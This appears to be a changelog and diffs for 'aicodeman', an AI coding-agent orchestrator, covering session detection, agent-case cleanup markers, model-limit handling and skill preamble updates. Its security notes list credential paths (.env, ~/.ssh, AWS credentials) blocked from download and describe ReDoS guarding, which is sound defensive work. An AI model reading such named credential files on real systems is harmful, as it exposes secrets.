- @irisitymichaelgrundberg for #394, #395, #396 and #397, and for the #398 investigation that separated three causes behind one symptom
- @JDProfresh for reporting #391 and fixing it in #392
## 1.26.1
### Patch Changes
- Codex sessions no longer report idle for their entire life, and Codex conversations now appear in Past Sessions and can be resumed.
**Per-CLI work detection (#385, irisitymichaelgrundberg).** The composer glyph and the working status line are now registry data (`capabilities.workDetect`) rather than Claude constants. Claude keeps its exact current pair, Codex declares `›` plus its `esc to interrupt` footer, and any CLI that declares neither falls back to Claude's, which is what every session used before. Work detection had been gated Claude-mode-only on the reasoning that an external CLI has no `❯`, which was true and still left every Codex session reporting `idle` from the moment it started. `workingLine` is config-supplied and its compiled pattern runs on the PTY hot path, so it goes through `compileVersionRegex()` in both the schema refine and the runtime compile: a nested quantifier there would backtrack on the event loop for the whole server. The Codex footer is matched case-insensitively on the E, so a future version capitalising it cannot make the fix silently inert.
**Codex conversations in Past Sessions (#386, irisitymichaelgrundberg).** A bounded scanner reads codex's `~/.codex/sessions` rollout store, so the unified session list now merges three transcript stores rather than one (Claude's `~/.claude/projects`, omp's `~/.omp/agent/sessions`, codex's `~/.codex/sessions`). A scanned row carries a `resumeId`, the rollout's own thread id, which lets it resume through `codexConfig.resumeSessionId`; a live session never carries one, so a row without it stays a genuinely fresh session. Live and resumed Codex sessions fold into their rollout row through the existing alias map, including a `session_meta.originator` match for fresh panes, so a conversation never shows up twice. The phone overview carries `resumeId` through its own row projection, without which a tapped Codex past row started a fresh session on a thread already on disk.
### Thanks
- @irisitymichaelgrundberg for both PRs (#385, #386), and for turning a full review round on #386 in a day.
## 1.26.0
### Minor Changes
- Tag the case directories agent workers create, and clean up what they leave behind.
A long agent orchestration creates one case directory per worker, and deleting the
sessions never removed them, so `~/codeman-cases` filled with scratch folders that
looked exactly like real projects.
- A case directory `POST /api/quick-start` **creates** for an agent-driven spawn now
carries a `.codeman-agent-case.json` marker recording when it was made, by whom,
from which session, and in which mode. Only the branch that creates the directory
writes it, so a linked case, a cloned repo or any pre-existing path is never
labelled, and deleting the marker file adopts a scratch case as a real one.
- The label comes from the new `X-Codeman-Agent-Origin` header that the packaged agent
skill sets on its shared curl invocation (preamble 1.22.0), or an `agentOrigin` body
field, falling back to a resolved `parentSessionId` so workers spawned by an older
skill copy are still labelled.
- `GET /api/cases` publishes it as `agentCreated`, and the new read-only
`GET /api/cases/agent-created` lists the scratch cases with `inUse` (a live session
is still working in it) and `modifiedAt`.
- Add Case -> Manage badges every agent-created case and adds a sticky **Clean up**
entry point that names each directory in its confirmation and skips any case a
running session is using. Removal still goes through `DELETE /api/cases/:name`.
- The agent skill's per-session preamble cache (`~/.cache/codeman-agent-<id>.sh`) is
now removed with the session and swept at boot. One was written per Claude session
and nothing ever deleted them (236 orphans on a working machine); the sweep keeps
every live session's file and only takes orphans older than seven days.
## 1.25.0
### Minor Changes
+15 -9
View File
File diff suppressed because one or more lines are too long
+1
View File
@@ -691,6 +691,7 @@ The web UI remains the primary surface; see **[docs/tui.md](docs/tui.md)** for t
| `Ctrl+Shift+{` / `Ctrl+Shift+}` | Move active tab left / right |
| `Ctrl/Cmd+C` | Copy selection, or interrupt when nothing is selected |
| `Ctrl+Shift+C` | Copy selection (never interrupts) |
| `Ctrl/Cmd+V` | Paste, or upload a clipboard image and paste its path |
| `Ctrl/Cmd+L` | Clear terminal |
| `Ctrl+Shift+R` | Restore terminal size |
| `Ctrl+Shift+V` | Toggle voice input |
File diff suppressed because one or more lines are too long
+7
View File
@@ -36,12 +36,19 @@ interface CliEntry {
launch: CliLaunch; // the structured argv template
env: CliEnv; // exports, tmux setenv keys, the env-override allowlist
capabilities: CliCapabilities; // what every call site reads instead of the id
// .workDetect?: { promptGlyph, workingLine } — how this CLI's pane shows work
overlays: CliOverlays; // remote-SSH / Docker pane commands, credential store
}
```
`capabilities` is the important part. It is what `isExternalCliMode()`, `isAltScreenStripMode()`, `hooksAvailableForMode()` and every other former per-mode branch actually read.
### Regexes that come from config
Two capability fields carry a regular expression an override file can set: `discovery.version.regex` and `capabilities.workDetect.workingLine`. Both go through `compileVersionRegex()`, which caps the source at 200 characters, refuses the nested-quantifier shapes that cause catastrophic backtracking, and returns `null` rather than throwing so every caller degrades instead of crashing.
`workingLine` is the one that matters most, because it is compiled once per session and then run against every accumulated PTY chunk and every pane capture. A nested quantifier there is a ReDoS against the event loop for the whole server, not just that session. The guard therefore runs in two places, and neither is redundant: `schema.ts` rejects the entry at LOAD time so a bad pattern never reaches a session, and `_workingLinePattern()` in `session.ts` compiles through the same helper so the runtime cannot end up with a pattern the schema would have refused.
### Three capabilities that must stay independent
`external`, `hooks` and `altScreen` describe three different, deliberately unequal sets, and deriving any one from another has already shipped a bug. `shell` has no hooks but is **not** an external CLI, so a hooks predicate written as `!isExternalCliMode()` accepted `until=stop` on a shell session and then blocked the caller for their entire timeout. `deepseek` is the mirror image: it IS external and it DOES have hooks.
+1 -1
View File
@@ -90,7 +90,7 @@ has to be copied; set them here to use a different bot.
| `PR_BOT_POLL_INTERVAL` | `600` | Seconds between GitHub polls (minimum 60). |
| `PR_BOT_MAIN_CHECKOUT` | the repo this script is in | The repository the clones share objects with and fetch from. |
| `PR_BOT_DATA_DIR` | `~/.codeman/pr-bot` | State, briefs, reports, clones. |
| `PR_BOT_MODEL` | unset (the session default) | Codeman `modelOverride` for the review sessions, e.g. `claude-fable-5-1`. |
| `PR_BOT_MODEL` | unset (the session default) | Codeman `modelOverride` for the review sessions, e.g. `opus[1m]`. ⚠️ Pick a model whose budget can absorb a re-review of every open PR on every head commit: when it runs out, Claude Code answers the limit **inside the turn** and the reviewer has nothing to write. The bot now names that failure in seconds (`findModelLimitNotice`) instead of burning the whole `PR_BOT_REVIEW_TIMEOUT`, and a limit does not spend the per-head retry budget, so the queue resumes by itself once the budget does. |
| `PR_BOT_EFFORT` | unset | Codeman `effort` for the review sessions. |
| `PR_BOT_REVIEW_TIMEOUT` | `40` | Minutes before a review is abandoned. |
| `PR_BOT_FOLLOWUP_TIMEOUT` | `20` | Minutes before a follow-up is abandoned. |
+3 -3
View File
@@ -312,8 +312,8 @@ TOCTOU window.
| Route | Cap | Notes |
|-------|-----|-------|
| `file-content` | 10 MB | text preview |
| `file-raw` | 50 MB | inline MIME map; **`X-Content-Type-Options: nosniff` on all responses**; streamed, `Range`-aware (206 slices come from the same validated path, and the cap is checked before the range) |
| `POST /api/download` | 50 MB | forced `attachment`; sensitive‑path blocklist |
| `file-raw` | 2 GB (`CODEMAN_MAX_DOWNLOAD_BYTES`, `0` = unlimited) | inline MIME map; **`X-Content-Type-Options: nosniff` on all responses**; streamed, `Range`-aware (206 slices come from the same validated path, and the cap is checked before the range) |
| `GET /api/download` | same cap | forced `attachment`; sensitive‑path blocklist; streamed, `Range`-aware |
### SVG / content‑type XSS
@@ -340,7 +340,7 @@ the attachment guard below.
Live external attachments (`src/attachment-registry.ts`) mint an `att_<uuid>` id
for a host file so browser requests carry the id, never an absolute path. Serving
is by id (`GET /api/sessions/:id/attachments/:attachmentId/raw`, 50 MB cap,
is by id (`GET /api/sessions/:id/attachments/:attachmentId/raw`, same download cap,
`nosniff`) and re‑resolves the symlink + re‑checks the **attachment guard**
(`src/config/attachment-guard.ts`: the shared sensitive‑path blocklist **plus**
the `/root` and `/etc` trees, extendable via `attachmentBlockedPaths` /
+1
View File
@@ -14,6 +14,7 @@ works, slash commands included.
| `Shift+Enter` / `Ctrl+Enter` | Newline without sending. |
| `Ctrl+C` | Copy if text is selected, otherwise interrupt. |
| `Ctrl+Shift+C` | Copy, never interrupts. |
| `Ctrl+V` | Paste. A clipboard image uploads instead. |
| `Ctrl+L` | Clear the terminal. |
### Exactly-once delivery
+1
View File
@@ -25,6 +25,7 @@ Press `Ctrl+?` in the app for the same list in a floating overlay.
| `Ctrl+Enter` | Same. |
| `Ctrl+C` | Copy the selection, or interrupt when nothing is selected. |
| `Ctrl+Shift+C` | Copy the selection. Never interrupts. |
| `Ctrl+V` | Paste. An image on the clipboard uploads and pastes its file path instead. |
| `Ctrl+L` | Clear the terminal. |
| `Ctrl+Shift+R` | Restore terminal size. |
| `Ctrl` `+` / `Ctrl` `-` | Font size. |
+3 -1
View File
@@ -19,7 +19,9 @@ It renders what it can:
| PDF and Office documents | Converted for preview when a converter is available. |
| Anything else | Download. |
Caps: 10 MB for text preview, 50 MB for raw and download. Sensitive paths (`.env`, anything
Caps: 10 MB for text preview, 2 GB for raw and download (set `CODEMAN_MAX_DOWNLOAD_BYTES`
to change it, `0` for no limit — these bodies are streamed, so a large file costs a read
stream rather than server memory). Sensitive paths (`.env`, anything
matching credentials, `~/.ssh`, AWS credentials) are blocked from download, and SVG and HTML
are served as downloads rather than rendered, so they cannot execute in the page.
+2 -2
View File
@@ -1,12 +1,12 @@
{
"name": "aicodeman",
"version": "1.25.0",
"version": "1.26.2",
"lockfileVersion": 3,
"requires": true,
"packages": {
"": {
"name": "aicodeman",
"version": "1.25.0",
"version": "1.26.2",
"hasInstallScript": true,
"license": "MIT",
"workspaces": [
+1 -1
View File
@@ -1,6 +1,6 @@
{
"name": "aicodeman",
"version": "1.25.0",
"version": "1.26.2",
"description": "Mission control for AI coding agents - run 20 autonomous agents with real-time monitoring and session persistence",
"type": "module",
"main": "dist/index.js",
+19 -5
View File
@@ -19,7 +19,7 @@
import { randomBytes } from 'crypto';
import { existsSync, mkdirSync, readFileSync, rmSync, writeFileSync } from 'fs';
import { join } from 'path';
import { CodemanClient, stripAnsi, type TurnOutcome } from './codeman-client.js';
import { CodemanClient, ModelLimitError, stripAnsi, type TurnOutcome } from './codeman-client.js';
import type { PrBotConfig } from './config.js';
import {
approveWorkflowRun,
@@ -434,7 +434,10 @@ export class PrBot {
if (report && !existsSync(reportMdPath)) writeFileSync(reportMdPath, last);
}
await this.recordClaudeSessionId(sessionId, rec);
if (!report) throw new Error(await this.describeFailure(sessionId, outcome, started, last));
if (!report) {
const why = await this.describeFailure(sessionId, outcome, started, last);
throw outcome.kind === 'limit' ? new ModelLimitError(why) : new Error(why);
}
const durationMin = Math.max(1, Math.round((Date.now() - started) / 60_000));
Object.assign(rec, {
@@ -460,9 +463,15 @@ export class PrBot {
if (rec) {
rec.status = 'failed';
rec.lastError = reason;
rec.failedAttempts = rec.failedSha === rec.headSha ? (rec.failedAttempts ?? 0) + 1 : 1;
rec.failedSha = rec.headSha;
const givingUp = rec.failedAttempts >= MAX_AUTO_RETRIES;
// A spent model budget is an account condition, not a bad PR, so it must not
// spend the per-head retry budget: otherwise one exhausted afternoon marks every
// open PR "not retrying on my own" and none of them come back when credits do.
const accountCondition = err instanceof ModelLimitError;
if (!accountCondition) {
rec.failedAttempts = rec.failedSha === rec.headSha ? (rec.failedAttempts ?? 0) + 1 : 1;
rec.failedSha = rec.headSha;
}
const givingUp = !accountCondition && (rec.failedAttempts ?? 0) >= MAX_AUTO_RETRIES;
await this.telegram
.sendMessage(
formatReviewFailure(rec, reason) +
@@ -523,6 +532,11 @@ export class PrBot {
}
case 'exit':
return 'the session exited before writing a report';
case 'limit':
return (
`the model budget for these review sessions is spent, so the reviewer never started:\n${outcome.message}\n` +
'Point PR_BOT_MODEL in ~/.codeman/pr-bot.env at a model with headroom and restart codeman-pr-bot.'
);
case 'timeout':
return `timed out after ${minutes} min without a report`;
default:
+50 -2
View File
@@ -50,7 +50,42 @@ export interface SessionRecord {
mode: string;
}
export type TurnOutcome = { kind: 'stop' } | { kind: 'blocked' } | { kind: 'exit' } | { kind: 'timeout' };
export type TurnOutcome =
| { kind: 'stop' }
| { kind: 'blocked' }
| { kind: 'exit' }
| { kind: 'timeout' }
| { kind: 'limit'; message: string };
/**
* Claude Code answers a spent model budget INSIDE the turn ("You've reached your Fable
* limit. Run /usage-credits to continue or switch models with /model.") and then simply
* sits there with nothing to write. Measured 2026-09-08: four reviews each burned their
* whole 40-minute deadline and reported a bare "timed out without a report", which reads
* as a hung reviewer rather than an account that needs attention, and the retries spent
* the per-head budget so the PRs would not have been picked up again once credits
* returned. Matching the notice turns 40 silent minutes into a named failure in seconds.
*
* Deliberately model-agnostic: the same sentence is printed for every model, and the
* apostrophe is typographic on the pane, so neither the model name nor `'` is matched.
*/
const MODEL_LIMIT_PATTERN = /reached your [^\n]{0,40}?\blimit\b|\/usage-credits/i;
/**
* Thrown instead of a plain Error when a review died on a spent model budget, so the
* caller can tell an account condition apart from a review that genuinely failed.
*/
export class ModelLimitError extends Error {
override readonly name = 'ModelLimitError';
}
/** The limit notice as one clean line, or undefined if the screen does not carry it. */
export function findModelLimitNotice(screen: string): string | undefined {
const line = stripAnsi(screen)
.split('\n')
.find((l) => MODEL_LIMIT_PATTERN.test(l));
return line?.replace(/^[\s>|]*(?:\u23bf|\u2514|\u256d|\u2570|\u23a2|\u2502|\u23bd)?\s*/u, '').trim() || undefined;
}
const sleep = (ms: number) => new Promise((r) => setTimeout(r, ms));
@@ -241,9 +276,22 @@ export class CodemanClient {
if (!r.delivered) throw new Error('the prompt was not delivered (pane dead?)');
let wait = r.wait;
let nudged = false;
// Only consulted when the turn produced nothing, so a review that merely QUOTES the
// notice in its report cannot be mistaken for one that hit it.
const limitNotice = async (): Promise<string | undefined> =>
findModelLimitNotice(await this.terminalText(id).catch(() => ''));
while (true) {
if (wait && !wait.timedOut) return toOutcome(wait);
if (wait && !wait.timedOut) {
const outcome = toOutcome(wait);
if (outcome.kind === 'stop' && !opts.isDone?.()) {
const limit = await limitNotice();
if (limit) return { kind: 'limit', message: limit };
}
return outcome;
}
if (opts.isDone?.()) return { kind: 'stop' };
const limit = await limitNotice();
if (limit) return { kind: 'limit', message: limit };
const remaining = opts.deadlineMs - (Date.now() - started);
if (remaining <= 0) return { kind: 'timeout' };
if (!nudged) {
+1 -1
View File
@@ -11,7 +11,7 @@
* worktree's project settings through the git common dir, i.e. the MAIN checkout's
* `.claude/settings.local.json`, whose model pin then silently overrides anything
* written into the worktree (measured 2026-09-05: a worktree pinned to
* `claude-fable-5-1` reported `claude-opus-5[1m]`). A shared clone has its own
* `claude-fable-5-1` reported `claude-opus-5[1m]`, the main checkout's pin). A shared clone has its own
* project root, so Codeman's `modelOverride` and hooks land where the CLI reads them,
* while `objects/info/alternates` keeps the object store shared (no duplication).
*
+14 -10
View File
@@ -47,7 +47,7 @@ later call opens with, and your first REAL call performs them anyway:
```bash
. "${XDG_CACHE_HOME:-$HOME/.cache}/codeman-agent-$CODEMAN_SESSION_ID.sh" 2>/dev/null
[ "${CODEMAN_PREAMBLE:-}" = 1.21.0 ] || { echo "preamble missing or stale; run the full §0 block"; exit 1; }
[ "${CODEMAN_PREAMBLE:-}" = 1.22.0 ] || { echo "preamble missing or stale; run the full §0 block"; exit 1; }
```
⚠️ **Never spend a Bash call on this check alone.** §1's block opens with this same
@@ -75,8 +75,8 @@ PRE="${XDG_CACHE_HOME:-$HOME/.cache}/codeman-agent-$CODEMAN_SESSION_ID.sh"
mkdir -p "$(dirname "$PRE")"
# Rewrite unless the file already ends with THIS version's stamp, so a stale or a
# half-written file self-heals here instead of costing you a round trip to rm it.
grep -qs '^CODEMAN_PREAMBLE=1.21.0$' "$PRE" || (umask 077; cat > "$PRE" <<'PREAMBLE'
# ---- Codeman agent preamble 1.21.0 (seeded by Codeman at session spawn; the SKILL.md §0 bootstrap rewrites it when missing or stale) ----
grep -qs '^CODEMAN_PREAMBLE=1.22.0$' "$PRE" || (umask 077; cat > "$PRE" <<'PREAMBLE'
# ---- Codeman agent preamble 1.22.0 (seeded by Codeman at session spawn; the SKILL.md §0 bootstrap rewrites it when missing or stale) ----
API="${CODEMAN_API_URL:?CODEMAN_API_URL not set; refusing to guess}"
SELF="${CODEMAN_SESSION_ID:?CODEMAN_SESSION_ID not set}"
# Credentials, cheapest first. Your session has usually INHERITED the server's
@@ -96,7 +96,10 @@ AUTH=(); [ -n "${CODEMAN_PASSWORD:-}" ] && AUTH=(-u "${CODEMAN_USERNAME:-admin}:
# draw the lineage. Set once here and every present and future create call carries it;
# it is ignored on every other endpoint. Purely cosmetic (see §5.1) and it can never
# fail a spawn, so there is no case where you would want to leave it off.
CURL=(curl -sk "${AUTH[@]}" -H "X-Codeman-Parent-Session: $SELF")
# X-Codeman-Agent-Origin: marks a case directory a spawn CREATES as agent scratch, so the
# user can find and delete it long after your workers are gone (§5.14). Same deal: set
# once, cosmetic, never fails a spawn, and it labels only directories Codeman creates.
CURL=(curl -sk "${AUTH[@]}" -H "X-Codeman-Parent-Session: $SELF" -H "X-Codeman-Agent-Origin: codeman-skill")
CID=codeman-agent-1 # FIXED literal, never "agent-$$": see below
# Fail-CLOSED session delete. The DELETE lives INSIDE the guard on purpose: the older
@@ -322,10 +325,10 @@ last_text() {
# The stamp is the LAST line on purpose (a truncated write leaves it unset) and is kept
# bare on purpose: the write condition above anchors on it with $, so an inline comment
# here would fail that match and rewrite this file on every single bootstrap.
CODEMAN_PREAMBLE=1.21.0
CODEMAN_PREAMBLE=1.22.0
PREAMBLE
)
. "$PRE"; [ "${CODEMAN_PREAMBLE:-}" = 1.21.0 ] || { echo "preamble at $PRE is stale or truncated: rm it and re-run this block"; exit 1; }
. "$PRE"; [ "${CODEMAN_PREAMBLE:-}" = 1.22.0 ] || { echo "preamble at $PRE is stale or truncated: rm it and re-run this block"; exit 1; }
```
Every later Bash call that touches the API starts with the same two loader lines from
@@ -376,7 +379,7 @@ and no per-call body to hand-build.
```bash
. "${XDG_CACHE_HOME:-$HOME/.cache}/codeman-agent-$CODEMAN_SESSION_ID.sh" 2>/dev/null # §0 loader
[ "${CODEMAN_PREAMBLE:-}" = 1.21.0 ] || { echo "preamble missing or stale; run the full §0 block"; exit 1; }
[ "${CODEMAN_PREAMBLE:-}" = 1.22.0 ] || { echo "preamble missing or stale; run the full §0 block"; exit 1; }
N=(alpha beta) # INVENT one fresh case name per worker; never list cases first
# (a name may carry a mode: `beta:deepseek`, see below)
T=('reply with one line: the absolute path of your working directory'
@@ -441,7 +444,8 @@ Four things this block leans on, each one link away, no detour needed to run it:
strands the prompt on the composer until a bare `\r` follows: all three are reasons
to let `sendwait` build the call rather than hand-rolling it.
- Each `sendwait` costs that worker one billed turn, as does every prompt you send it.
- Deleting the sessions does **not** remove the case directories: §5.14.
- Deleting the sessions does **not** remove the case directories. They are marked as
agent-created, so `GET /api/v1/cases/agent-created` lists them for cleanup: §5.14.
### DeepSeek Harness workers
@@ -494,7 +498,7 @@ One row per job. Acting on this table alone is correct; the §5 links are the de
| find yourself, list what exists | `GET /api/v1/sessions`, match your `$SELF` by **prefix** | [§5.11](reference/verbs.md#511-list-and-find-yourself) |
| read or record what the user wants | `GET/PUT .../intent`, and `POST .../readmymind` to predict | [§5.12](reference/verbs.md#512-read-my-mind) |
| talk to a claude worker directly | `ListAgents` / `SendMessage`, when the feature is on at both ends | [§5.13](reference/verbs.md#513-messaging-claude-workers) |
| clean up | `delete_session "$SID"` per id you created. Case directories and git worktrees are **not** removed with it | [§5.14](reference/verbs.md#514-clean-up) |
| clean up | `delete_session "$SID"` per id you created. Case directories and git worktrees are **not** removed with it; `GET /api/v1/cases/agent-created` lists the scratch case dirs your spawns left behind, for you to report | [§5.14](reference/verbs.md#514-clean-up) |
## 3. Rules digest
@@ -595,7 +599,7 @@ these**; open the one row you actually hit.
| [5.11 List and find yourself](reference/verbs.md#511-list-and-find-yourself) | enumerate sessions, or match `$SELF` by prefix |
| [5.12 Read My Mind](reference/verbs.md#512-read-my-mind) | read or record what the user wants for a case |
| [5.13 Messaging claude workers](reference/verbs.md#513-messaging-claude-workers) | `ListAgents` / `SendMessage` instead of the HTTP path |
| [5.14 Clean up](reference/verbs.md#514-clean-up) | what deleting a session does **not** remove |
| [5.14 Clean up](reference/verbs.md#514-clean-up) | what deleting a session does **not** remove, and how to list the case dirs you left |
## 6. Setup and auth
+6 -3
View File
@@ -1,4 +1,4 @@
# ---- Codeman agent preamble 1.21.0 (seeded by Codeman at session spawn; the SKILL.md §0 bootstrap rewrites it when missing or stale) ----
# ---- Codeman agent preamble 1.22.0 (seeded by Codeman at session spawn; the SKILL.md §0 bootstrap rewrites it when missing or stale) ----
API="${CODEMAN_API_URL:?CODEMAN_API_URL not set; refusing to guess}"
SELF="${CODEMAN_SESSION_ID:?CODEMAN_SESSION_ID not set}"
# Credentials, cheapest first. Your session has usually INHERITED the server's
@@ -18,7 +18,10 @@ AUTH=(); [ -n "${CODEMAN_PASSWORD:-}" ] && AUTH=(-u "${CODEMAN_USERNAME:-admin}:
# draw the lineage. Set once here and every present and future create call carries it;
# it is ignored on every other endpoint. Purely cosmetic (see §5.1) and it can never
# fail a spawn, so there is no case where you would want to leave it off.
CURL=(curl -sk "${AUTH[@]}" -H "X-Codeman-Parent-Session: $SELF")
# X-Codeman-Agent-Origin: marks a case directory a spawn CREATES as agent scratch, so the
# user can find and delete it long after your workers are gone (§5.14). Same deal: set
# once, cosmetic, never fails a spawn, and it labels only directories Codeman creates.
CURL=(curl -sk "${AUTH[@]}" -H "X-Codeman-Parent-Session: $SELF" -H "X-Codeman-Agent-Origin: codeman-skill")
CID=codeman-agent-1 # FIXED literal, never "agent-$$": see below
# Fail-CLOSED session delete. The DELETE lives INSIDE the guard on purpose: the older
@@ -244,4 +247,4 @@ last_text() {
# The stamp is the LAST line on purpose (a truncated write leaves it unset) and is kept
# bare on purpose: the write condition above anchors on it with $, so an inline comment
# here would fail that match and rewrite this file on every single bootstrap.
CODEMAN_PREAMBLE=1.21.0
CODEMAN_PREAMBLE=1.22.0
+9
View File
@@ -364,6 +364,15 @@ the global 50, or the per-user 25 in multi-user mode, never the waiter cap),
`CONFLICT`, `OPERATION_FAILED` and `INVALID_INPUT`. None of them are retryable in a
loop.
⚠️ A case directory quick-start **creates** for you is labelled agent-created (a
`.codeman-agent-case.json` marker, written because the §0 preamble sends
`X-Codeman-Agent-Origin`), which is what lets the user find it afterwards:
`GET /api/v1/cases/agent-created` returns `.data.cases[]` of
`{name, path, createdAt, createdBy, parentSessionId, inUse, modifiedAt}`, newest first,
read-only, scoped to the caller's own case space. Report it when you finish; deleting is
`DELETE /api/v1/cases/:name` and is the user's call by name ([§5.14](verbs.md#514-clean-up)).
A directory that already existed is never labelled.
⚠️ `caseName` resolves through the linked-cases registry first, so a name that happens
to match a case the user linked in lands in that **real repo**, not a fresh scratch
directory. Pick distinctive scratch names, and use a linked name deliberately when you
+1 -1
View File
@@ -21,7 +21,7 @@ by sourcing the preamble file the §0 bootstrap wrote, and checking its version
```bash
. "${XDG_CACHE_HOME:-$HOME/.cache}/codeman-agent-$CODEMAN_SESSION_ID.sh" 2>/dev/null
[ "${CODEMAN_PREAMBLE:-}" = 1.18.3 ] || { echo "preamble missing or stale; re-run the §0 bootstrap"; exit 1; }
[ "${CODEMAN_PREAMBLE:-}" = 1.22.0 ] || { echo "preamble missing or stale; re-run the §0 bootstrap"; exit 1; }
```
Do **not** re-paste the preamble body into each call. Sourcing it is what retires the
+15
View File
@@ -731,6 +731,21 @@ Deleting a session ends the agent and its pane. It does **not** remove:
it, and ask before running `git worktree remove`, which discards uncommitted work
inside it.
Those case directories are **labelled** rather than left anonymous. A directory
`quick-start` creates for a spawn carrying the preamble's `X-Codeman-Agent-Origin`
header gets a `.codeman-agent-case.json` marker, which is what puts it in the web UI's
agent-case cleanup list (Add Case → Manage) and in:
```bash
"${CURL[@]}" "$API/api/v1/cases/agent-created" | jq -r '.data.cases[] | "\(.name)\t\(.createdAt)\tinUse=\(.inUse)"'
```
Read-only, scoped to the user's own case space, and `inUse` is true while a live
session is still working in that directory. Report that list when you finish a run
with workers, so the user knows exactly what to sweep; the deletion is still theirs to
ask for by name. Only a directory Codeman **created** is ever labelled, so a linked
case, a cloned repo or a worktree never appears there.
Confirm cleanup with `GET /api/v1/sessions`, never with `/api/v1/sessions/unified`
(that one folds in transcript history from the whole machine and will keep showing
your worker forever).
+183
View File
@@ -0,0 +1,183 @@
/**
* @fileoverview The marker file that records a case directory as one Codeman scaffolded
* FOR an agent-spawned session, so scratch worker workspaces can be told apart from the
* user's real projects long after the sessions that created them are gone.
*
* Why a file in the case directory rather than a central registry in `~/.codeman`:
* the thing being labelled is a directory on the user's disk, and the label has to
* survive everything that can happen to Codeman's own state (a wiped data dir, a
* different instance, a hand-moved case). A registry would also need stale-entry
* pruning and owner scoping of its own, while a marker is deleted by the same `rm -rf`
* that deletes the case, and is discoverable by a user who just runs `ls -a`.
*
* ⚠️ Written ONLY on the path that CREATES the directory (`POST /api/quick-start`'s
* `!existsSync` branch). A linked case, a cloned repo, a git worktree or any other
* pre-existing directory must never be labelled agent-created: the label drives a
* cleanup affordance, and mislabelling someone's repo there is the one failure mode
* that costs real work. `POST /api/sessions` takes an existing `workingDir` and so
* writes no marker at all, by construction.
*
* ⚠️ Reading is strict and total: anything that does not parse as a version-1 marker
* (truncated write, hand-edited junk, a user's unrelated file of the same name) reads
* as "not agent-created" rather than as a partially-trusted entry. A marker is
* metadata; deleting the file is the supported way to adopt a scratch case as a real
* one, which is what the `note` field written into it tells the user.
*/
import { readFile, writeFile } from 'node:fs/promises';
import { join } from 'node:path';
/** Marker filename inside the case directory. Dot-prefixed so it stays out of the way. */
export const AGENT_CASE_MARKER_FILE = '.codeman-agent-case.json';
/** Current marker schema version. A marker of any other version reads as absent. */
export const AGENT_CASE_MARKER_VERSION = 1;
/**
* Origin recorded when a create request carried a resolvable spawning session but no
* explicit origin of its own (an agent driving the API by hand, or an older copy of
* the skill). Nothing in the browser UI sets lineage, so this really does mean "another
* session spawned this", not "a human clicked Run".
*/
export const AGENT_ORIGIN_SPAWNED_BY_SESSION = 'agent-session';
/** Origin the packaged agent skill sends on its shared curl invocation. */
export const AGENT_ORIGIN_CODEMAN_SKILL = 'codeman-skill';
/** Longest accepted origin token (the value is echoed into the UI and the marker). */
const MAX_ORIGIN_LENGTH = 32;
/** Longest accepted free-text field read back out of a marker. */
const MAX_MARKER_FIELD_LENGTH = 200;
/** Lowercase token: what an origin may look like on the wire and on disk. */
const AGENT_ORIGIN_PATTERN = /^[a-z0-9][a-z0-9._-]*$/;
/** Explains the file to whoever finds it in their case directory. */
const MARKER_NOTE =
'Created by a Codeman agent worker (see the Manage tab in Add Case). ' +
'Delete this file to keep the case out of the agent-case cleanup list; ' +
'deleting the whole directory removes the case.';
/**
* What a case directory records about the agent spawn that created it.
* Every field beyond `version`/`createdAt`/`createdBy` is decoration for the cleanup UI.
*/
export interface AgentCaseMarker {
version: typeof AGENT_CASE_MARKER_VERSION;
/** ISO timestamp of the spawn that created the directory. */
createdAt: string;
/** Who asked: `codeman-skill`, `agent-session`, or another caller's own token. */
createdBy: string;
/** Full id of the session that spawned the worker, when one resolved. */
parentSessionId?: string;
/** That session's display name at spawn time, so the user recognises it later. */
parentSessionName?: string;
/** Run mode the worker was started in (`claude`, `deepseek`, …). */
mode?: string;
/** Owner the case was created for, in multi-user mode. */
owner?: string;
}
/**
* Validate an origin token coming off the wire (`agentOrigin` body field or the
* `X-Codeman-Agent-Origin` header). Returns `undefined` for anything that is not a
* short lowercase token — the value reaches the UI and a JSON file, so it is
* allowlisted rather than escaped at each use.
*/
export function normalizeAgentOrigin(raw: unknown): string | undefined {
if (typeof raw !== 'string') return undefined;
const value = raw.trim().toLowerCase();
if (!value || value.length > MAX_ORIGIN_LENGTH) return undefined;
return AGENT_ORIGIN_PATTERN.test(value) ? value : undefined;
}
/** Trim an optional free-text marker field to something safe to store and render. */
function normalizeField(raw: unknown): string | undefined {
if (typeof raw !== 'string') return undefined;
const value = raw.trim();
return value ? value.slice(0, MAX_MARKER_FIELD_LENGTH) : undefined;
}
/**
* Build a marker from a spawn's details. Pure, so the route can hand it straight to
* the writer and the tests can assert on the shape without touching a disk.
*/
export function buildAgentCaseMarker(input: {
createdBy: string;
createdAt?: Date;
parentSessionId?: string;
parentSessionName?: string;
mode?: string;
owner?: string;
}): AgentCaseMarker {
const marker: AgentCaseMarker = {
version: AGENT_CASE_MARKER_VERSION,
createdAt: (input.createdAt ?? new Date()).toISOString(),
createdBy: normalizeAgentOrigin(input.createdBy) ?? AGENT_ORIGIN_SPAWNED_BY_SESSION,
};
const parentSessionId = normalizeField(input.parentSessionId);
const parentSessionName = normalizeField(input.parentSessionName);
const mode = normalizeField(input.mode);
const owner = normalizeField(input.owner);
if (parentSessionId) marker.parentSessionId = parentSessionId;
if (parentSessionName) marker.parentSessionName = parentSessionName;
if (mode) marker.mode = mode;
if (owner) marker.owner = owner;
return marker;
}
/**
* Parse marker JSON. Returns `null` for anything that is not a well-formed version-1
* marker, including a valid-JSON object of the wrong shape — see the strictness note
* in the file header.
*/
export function parseAgentCaseMarker(raw: string): AgentCaseMarker | null {
let value: unknown;
try {
value = JSON.parse(raw);
} catch {
return null;
}
if (!value || typeof value !== 'object' || Array.isArray(value)) return null;
const record = value as Record<string, unknown>;
if (record.version !== AGENT_CASE_MARKER_VERSION) return null;
const createdAt = normalizeField(record.createdAt);
const createdBy = normalizeAgentOrigin(record.createdBy);
if (!createdAt || !createdBy || Number.isNaN(Date.parse(createdAt))) return null;
return buildAgentCaseMarker({
createdBy,
createdAt: new Date(createdAt),
parentSessionId: normalizeField(record.parentSessionId),
parentSessionName: normalizeField(record.parentSessionName),
mode: normalizeField(record.mode),
owner: normalizeField(record.owner),
});
}
/**
* Write the marker into `casePath`. Best-effort by design: the marker is metadata for
* a later cleanup, and a failed write must never fail the worker spawn that is the
* point of the request. Returns whether it landed.
*/
export async function writeAgentCaseMarker(casePath: string, marker: AgentCaseMarker): Promise<boolean> {
try {
const body = JSON.stringify({ ...marker, note: MARKER_NOTE }, null, 2);
